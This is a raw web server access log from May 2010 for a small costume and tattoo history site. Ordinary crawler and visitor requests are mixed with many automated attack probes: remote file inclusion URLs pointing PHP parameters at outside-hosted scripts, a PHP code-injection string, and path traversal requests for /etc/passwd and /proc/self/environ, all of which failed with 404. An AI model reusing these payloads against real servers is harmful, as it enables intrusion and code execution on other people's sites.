205.234.252.102 - - [08/May/2010:08:57:35 -0500] "GET /logs/access_log.1262736000/src/admin/pt_upload.php?config_file=http://www.snij.info/orn2/data/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
205.234.252.102 - - [08/May/2010:08:57:44 -0500] "GET /logs/src/admin/pt_upload.php?config_file=http://www.snij.info/orn2/data/id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
205.234.252.102 - - [08/May/2010:08:57:44 -0500] "GET /logs/access_log.1264118400/src/admin/pt_upload.php?config_file=http://www.snij.info/orn2/data/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
205.234.252.102 - - [08/May/2010:08:57:44 -0500] "GET /src/admin/pt_upload.php?config_file=http://www.snij.info/orn2/data/id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
205.234.252.102 - - [08/May/2010:08:57:44 -0500] "GET /logs/access_log.1262736000/src/admin/pt_upload.php?config_file=http://www.snij.info/orn2/data/id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
67.218.116.166 - - [08/May/2010:08:57:59 -0500] "GET /logs/access_log.1245888000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.131 - - [08/May/2010:08:59:31 -0500] "GET /artwork/miscellaneous.htm HTTP/1.1" 404 309 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.129.119.13 - - [08/May/2010:09:04:35 -0500] "GET /logs/access_log.1266451200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [08/May/2010:09:08:00 -0500] "GET /logs/access_log.1218240000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [08/May/2010:09:12:16 -0500] "GET /logs/access_log.1265500800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
88.131.106.30 - - [08/May/2010:09:12:28 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
88.131.106.30 - - [08/May/2010:09:12:29 -0500] "GET /costume/thmb8.htm HTTP/1.0" 200 3054 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)"
194.158.198.117 - - [08/May/2010:09:15:00 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://ru.wikipedia.org/wiki/%D0%9A%D0%BE%D1%81%D1%82%D1%8E%D0%BC""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
194.158.198.117 - - [08/May/2010:09:15:00 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
194.158.198.117 - - [08/May/2010:09:15:04 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
216.129.119.10 - - [08/May/2010:09:15:10 -0500] "GET /logs/access_log.1245628800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
194.158.198.117 - - [08/May/2010:09:15:18 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
194.158.198.117 - - [08/May/2010:09:15:19 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
194.158.198.117 - - [08/May/2010:09:15:19 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
194.158.198.117 - - [08/May/2010:09:15:20 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
207.46.13.96 - - [08/May/2010:09:22:50 -0500] "GET /logs/access_log.1265932800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.0.74.195 - - [08/May/2010:09:23:09 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
124.0.74.195 - - [08/May/2010:09:23:09 -0500] "GET /logs/access_log.1263772800///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
124.0.74.195 - - [08/May/2010:09:23:09 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gigacenter.cl//tmp/id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
87.250.255.243 - - [08/May/2010:09:28:20 -0500] "GET /logs/access_log.1228867200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.190.102.21 - - [08/May/2010:09:31:23 -0500] "GET //m2f/m2f_cron.php?m2f_root_path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
121.190.102.21 - - [08/May/2010:09:31:23 -0500] "GET /logs//m2f/m2f_cron.php?m2f_root_path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
121.190.102.21 - - [08/May/2010:09:31:23 -0500] "GET /logs/access_log.1266278400//m2f/m2f_cron.php?m2f_root_path=http://francophonie.utm.md/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.46.204.191 - - [08/May/2010:09:32:20 -0500] "GET /logs/access_log.1174348800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.123.124.82 - - [08/May/2010:09:33:06 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.831"
72.29.80.127 - - [08/May/2010:09:33:09 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
66.249.65.40 - - [08/May/2010:09:34:31 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.40 - - [08/May/2010:09:34:31 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.172.150.13 - - [08/May/2010:09:35:09 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.825"
194.108.112.112 - - [08/May/2010:09:36:49 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
65.49.28.194 - - [08/May/2010:09:38:57 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.820"
207.46.204.181 - - [08/May/2010:09:42:50 -0500] "GET /logs/access_log.1218412800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [08/May/2010:09:43:51 -0500] "GET /logs/access_log.1244246400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
114.108.151.149 - - [08/May/2010:09:44:25 -0500] "GET /logs/access_log.1237420800%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:09:44:25 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:09:44:25 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
93.159.16.170 - - [08/May/2010:09:44:32 -0500] "GET /historialeer.php?num=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
93.159.16.170 - - [08/May/2010:09:44:32 -0500] "GET /logs/historialeer.php?num=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 305 "-""libwww-perl/5.805"
114.108.151.149 - - [08/May/2010:09:44:35 -0500] "GET /logs/access_log.1270512000%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:09:44:42 -0500] "GET /logs/access_log.1265673600//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
114.108.151.149 - - [08/May/2010:09:44:42 -0500] "GET /logs/access_log.1265500800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.misapro.com/img_upload/fx29id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:09:49:44 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:09:49:44 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:09:49:44 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:09:49:45 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:09:49:49 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:09:49:49 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:09:49:49 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:09:49:50 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:09:49:50 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:09:50:00 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:09:50:00 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:09:50:00 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
210.50.189.221 - - [08/May/2010:09:50:26 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
220.181.7.106 - - [08/May/2010:09:51:34 -0500] "GET /costume/costume1.htm HTTP/1.1" 304 - "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
174.123.124.82 - - [08/May/2010:09:52:24 -0500] "GET /logs/access_log.1228089600//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 321 "-""libwww-perl/5.831"
174.123.124.82 - - [08/May/2010:09:52:24 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.831"
174.123.124.82 - - [08/May/2010:09:52:24 -0500] "GET /logs//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.831"
99.39.2.249 - - [08/May/2010:09:52:26 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
216.129.119.43 - - [08/May/2010:09:52:55 -0500] "GET /logs/access_log.1271548800 HTTP/1.1" 200 576917 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
72.29.80.127 - - [08/May/2010:09:53:56 -0500] "GET /logs/access_log.1228089600//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
72.29.80.127 - - [08/May/2010:09:53:57 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
72.29.80.127 - - [08/May/2010:09:53:57 -0500] "GET /logs//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.250.255.243 - - [08/May/2010:09:54:07 -0500] "GET /logs/access_log.1222646400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
62.128.135.38 - - [08/May/2010:09:54:12 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
62.128.135.38 - - [08/May/2010:09:54:12 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
99.39.2.249 - - [08/May/2010:09:54:25 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
99.39.2.249 - - [08/May/2010:09:54:39 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.limawarriors.com/administrator/ID1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
207.46.13.99 - - [08/May/2010:09:54:50 -0500] "GET /logs/access_log.1196899200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
76.1.178.128 - - [08/May/2010:09:55:23 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?q=1930%27s%20tattoo%20flash&um=1&hl=en&ndsp=20&ie=UTF-8&sa=N&tab=iw""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:24 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:24 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:26 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:27 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:27 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:27 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:27 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:27 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:27 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:27 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:27 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:27 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:27 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:27 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:36 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:36 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:36 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:36 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:36 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:36 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:36 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:36 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:36 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:36 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:36 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:52 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:52 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:52 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:52 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:52 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:52 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:52 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:52 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:52 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:52 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:55:52 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:56:02 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:56:02 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:56:02 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:56:02 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
76.1.178.128 - - [08/May/2010:09:56:02 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
